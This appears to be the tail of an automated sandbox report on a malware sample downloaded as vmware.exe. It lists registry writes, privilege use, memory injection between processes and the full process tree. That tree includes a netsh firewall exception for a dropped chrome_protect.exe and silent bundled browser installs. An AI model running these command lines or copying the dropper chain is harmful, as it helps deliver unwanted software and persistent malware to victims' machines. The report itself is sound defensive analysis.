Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 1900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b40300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b809000000010000000c000000300a06082b060105050703031d00000001000000100000005467b0adde8d858e30ee517b1a19ecd91400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b53000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c06200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df860b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000000f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb7
70d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 C:\Users\Admin\AppData\Local\Temp\yadl.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E C:\Users\Admin\AppData\Local\Temp\yadl.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VVOFDIUO\vmware.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2588 wrote to memory of 116 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2588 wrote to memory of 116 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2588 wrote to memory of 116 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2588 wrote to memory of 3864 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VVOFDIUO\vmware.exe
PID 2588 wrote to memory of 3864 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VVOFDIUO\vmware.exe
PID 3864 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VVOFDIUO\vmware.exe C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe
PID 3864 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VVOFDIUO\vmware.exe C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe
PID 3864 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VVOFDIUO\vmware.exe C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe
PID 3864 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VVOFDIUO\vmware.exe C:\Users\Admin\AppData\Local\Temp\KLSetup.exe
PID 3864 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VVOFDIUO\vmware.exe C:\Users\Admin\AppData\Local\Temp\KLSetup.exe
PID 3864 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VVOFDIUO\vmware.exe C:\Users\Admin\AppData\Local\Temp\KLSetup.exe
PID 4116 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe
PID 4116 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe
PID 4116 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe
PID 1284 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\KLSetup.exe C:\Users\Admin\AppData\Local\Temp\yadl.exe
PID 1284 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\KLSetup.exe C:\Users\Admin\AppData\Local\Temp\yadl.exe
PID 1284 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\KLSetup.exe C:\Users\Admin\AppData\Local\Temp\yadl.exe
PID 540 wrote to memory of 4884 N/A C:\Users\Admin\AppData\Local\Temp\yadl.exe C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe
PID 540 wrote to memory of 4884 N/A C:\Users\Admin\AppData\Local\Temp\yadl.exe C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe
PID 540 wrote to memory of 4884 N/A C:\Users\Admin\AppData\Local\Temp\yadl.exe C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe
PID 540 wrote to memory of 4532 N/A C:\Users\Admin\AppData\Local\Temp\yadl.exe C:\Users\Admin\AppData\Local\Temp\yadl.exe
PID 540 wrote to memory of 4532 N/A C:\Users\Admin\AppData\Local\Temp\yadl.exe C:\Users\Admin\AppData\Local\Temp\yadl.exe
PID 540 wrote to memory of 4532 N/A C:\Users\Admin\AppData\Local\Temp\yadl.exe C:\Users\Admin\AppData\Local\Temp\yadl.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://temp.sh/WwJqO/vmware.exe

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2588 CREDAT:17410 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4180,i,18168883380598738769,14202261231630113808,262144 --variations-seed-version --mojo-platform-channel-handle=2376 /prefetch:8

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VVOFDIUO\vmware.exe

"C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VVOFDIUO\vmware.exe"

C:\Users\Admin\AppData\Local\Temp\WTLDR.exe

"C:\Users\Admin\AppData\Local\Temp\WTLDR.exe"

C:\Users\Admin\AppData\Local\Temp\KLSetup.exe

"C:\Users\Admin\AppData\Local\Temp\KLSetup.exe"

C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe

"C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe"

C:\Users\Admin\AppData\Local\Temp\yadl.exe

"C:\Users\Admin\AppData\Local\Temp\yadl.exe" --partner 418804 --distr /quiet /msicl "YABROWSER=y YAQSEARCH=y YAHOMEPAGE=y VID=354"

C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe

"C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe" /quiet /msicl "YABROWSER=y YAQSEARCH=y YAHOMEPAGE=y VID=354"

C:\Users\Admin\AppData\Local\Temp\yadl.exe

C:\Users\Admin\AppData\Local\Temp\yadl.exe --stat dwnldr/p=418804/rid=10b1d6f7-efc7-49b9-9644-adb9b1999803/sbr=0-0/hrc=200-200/bd=267-10639168/gtpr=1-1-1-255-1/cdr=0-b7-b7-ff-b7/for=3-0/fole=255-0/fwle=255-0/vr=ff-0/vle=ff-0/hovr=ff-ff/hovle=ff-ff/shle=ff-0/vmajor=10/vminor=0/vbuild=19041/distr_type=landing/cnt=0/dt=2/ct=0/rt=0 --dh 2400 --st 1719179731

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe" "chrome_protect.exe" ENABLE

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 305E3848A6BE4F7A292571F59A0F957F

C:\Users\Admin\AppData\Local\Temp\E6E36528-865A-4F67-A4B6-616A6EA2DAD6\lite_installer.exe

"C:\Users\Admin\AppData\Local\Temp\E6E36528-865A-4F67-A4B6-616A6EA2DAD6\lite_installer.exe" --use-user-default-locale --silent --remote-url=http://downloader.yandex.net/downloadable_soft/browser/pseudoportal-ru/Yandex.exe --cumtom-welcome-page=https://browser.yandex.ru/promo/welcome_com/5/ --YABROWSER

C:\Users\Admin\AppData\Local\Temp\45FA5734-C188-4A17-BD53-A04B9DCA00A5\seederexe.exe

"C:\Users\Admin\AppData\Local\Temp\45FA5734-C188-4A17-BD53-A04B9DCA00A5\seederexe.exe" "--yqs=y" "--yhp=y" "--ilight=" "--oem=" "--nopin=n" "--pin_custom=n" "--pin_desktop=n" "--pin_taskbar=y" "--locale=us" "--browser=y" "--browser_default=" "--loglevel=trace" "--ess=" "--clids=C:\Users\Admin\AppData\Local\Temp\clids-yasearch.xml" "--sender=C:\Users\Admin\AppData\Local\Temp\6920E5B4-1D3A-475A-9E68-F99DF9289181\sender.exe" "--is_elevated=yes" "--ui_level=2" "--good_token=x" "--no_opera=n"

C:\Users\Admin\AppData\Local\Yandex\YaPin\Yandex.exe

C:\Users\Admin\AppData\Local\Yandex\YaPin\Yandex.exe --silent --pin-taskbar=y --pin-desktop=n

C:\Users\Admin\AppData\Local\Temp\pin\explorer.exe

C:\Users\Admin\AppData\Local\Yandex\YaPin\Yandex.exe --silent --pin-taskbar=y --pin-desktop=n /pin-path="C:\Users\Admin\AppData\Local\Yandex\YaPin\Yandex.lnk" --is-pinning

C:\Users\Admin\AppData\Local\Temp\6920E5B4-1D3A-475A-9E68-F99DF9289181\sender.exe

C:\Users\Admin\AppData\Local\Temp\6920E5B4-1D3A-475A-9E68-F99DF9289181\sender.exe --send "/status.xml?clid=6035492-354&uuid=0805d991-6e7d-4048-beee-e5c45536178d&vnt=Windows 10x64&file-no=8%0A10%0A11%0A12%0A13%0A15%0A17%0A18%0A20%0A21%0A22%0A25%0A36%0A40%0A42%0A45%0A57%0A61%0A89%0A102%0A103%0A111%0A123%0A124%0A125%0A129%0A"

C:\Users\Admin\AppData\Local\Temp\{D75E8FFB-E220-4A56-8F34-15BD8F50E315}.exe

"C:\Users\Admin\AppData\Local\Temp\{D75E8FFB-E220-4A56-8F34-15BD8F50E315}.exe" --job-name=yBrowserDownloader-{2830C1E5-8483-450B-8A59-CC558EB0D581} --send-statistics --local-path=C:\Users\Admin\AppData\Local\Temp\{D75E8FFB-E220-4A56-8F34-15BD8F50E315}.exe --YABROWSER --cumtom-welcome-page=https://browser.yandex.ru/promo/welcome_com/5/ --silent --remote-url=http://downloader.yandex.net/downloadable_soft/browser/pseudoportal-ru/Yandex.exe?clid=6035461-354&ui={0805d991-6e7d-4048-beee-e5c45536178d} --use-user-default-locale

C:\Users\Admin\AppData\Roaming\.minecraft\KLauncher.exe

"C:\Users\Admin\AppData\Roaming\.minecraft\KLauncher.exe"

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe

"C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe" -version

C:\Windows\system32\icacls.exe

C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe

"C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe" -XX:+UseG1GC -Dfile.encoding=UTF-8 -jar "C:\Users\Admin\AppData\Roaming\.minecraft\KLauncher.exe"

C:\Windows\System32\GameBarPresenceWriter.exe

"C:\Windows\System32\GameBarPresenceWriter.exe" -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\java.exe

java.exe -version

C:\Users\Admin\AppData\Local\Temp\yb93EE.tmp

"C:\Users\Admin\AppData\Local\Temp\yb93EE.tmp" --abt-config-resource-file="C:\Users\Admin\AppData\Local\Temp\abt_config_resource" --abt-update-path="C:\Users\Admin\AppData\Local\Temp\0de1d919-8e76-460f-bae5-959eaf727451.tmp" --brand-name=yandex --brand-package="C:\Users\Admin\AppData\Local\Temp\BrandFile" --clids-file="C:\Users\Admin\AppData\Local\Temp\clids.xml" --cumtom-welcome-page=https://browser.yandex.ru/promo/welcome_com/5/ --install-start-time-no-uac=541385404 --installer-brand-id=yandex --installer-partner-id=pseudoportal-ru --installerdata="C:\Users\Admin\AppData\Local\Temp\master_preferences" --job-name=yBrowserDownloader-{2830C1E5-8483-450B-8A59-CC558EB0D581} --local-path="C:\Users\Admin\AppData\Local\Temp\{D75E8FFB-E220-4A56-8F34-15BD8F50E315}.exe" --partner-package="C:\Users\Admin\AppData\Local\Temp\PartnerFile" --progress-window=0 --remote-url=http://downloader.yandex.net/downloadable_soft/browser/pseudoportal-ru/Yandex.exe?clid=6035461-354&ui={0805d991-6e7d-4048-beee-e5c45536178d} --send-statistics --silent --source=lite --use-user-default-locale --variations-update-path="C:\Users\Admin\AppData\Local\Temp\9ed2cb0c-90f5-4967-8273-2b90a8fd393f.tmp" --verbose-logging --yabrowser --yandex-website-icon-file="C:\Users\Admin\AppData\Local\Temp\website.ico"

C:\Users\Admin\AppData\Local\Temp\YB_970D5.tmp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\YB_970D5.tmp\setup.exe" --install-archive="C:\Users\Admin\AppData\Local\Temp\YB_970D5.tmp\BROWSER.PACKED.7Z" --abt-config-resource-file="C:\Users\Admin\AppData\Local\Temp\abt_config_resource" --abt-update-path="C:\Users\Admin\AppData\Local\Temp\0de1d919-8e76-460f-bae5-959eaf727451.tmp" --brand-name=yandex --brand-package="C:\Users\Admin\AppData\Local\Temp\BrandFile" --clids-file="C:\Users\Admin\AppData\Local\Temp\clids.xml" --cumtom-welcome-page=https://browser.yandex.ru/promo/welcome_com/5/ --install-start-time-no-uac=541385404 --installer-brand-id=yandex --installer-partner-id=pseudoportal-ru --installerdata="C:\Users\Admin\AppData\Local\Temp\master_preferences" --job-name=yBrowserDownloader-{2830C1E5-8483-450B-8A59-CC558EB0D581} --local-path="C:\Users\Admin\AppData\Local\Temp\{D75E8FFB-E220-4A56-8F34-15BD8F50E315}.exe" --partner-package="C:\Users\Admin\AppData\Local\Temp\PartnerFile" --progress-window=0 --remote-url=http://downloader.yandex.net/downloadable_soft/browser/pseudoportal-ru/Yandex.exe?clid=6035461-354&ui={0805d991-6e7d-4048-beee-e5c45536178d} --send-statistics --silent --source=lite --use-user-default-locale --variations-update-path="C:\Users\Admin\AppData\Local\Temp\9ed2cb0c-90f5-4967-8273-2b90a8fd393f.tmp" --verbose-logging --yabrowser --yandex-website-icon-file="C:\Users\Admin\AppData\Local\Temp\website.ico"

C:\Users\Admin\AppData\Local\Temp\YB_970D5.tmp\setup.exe

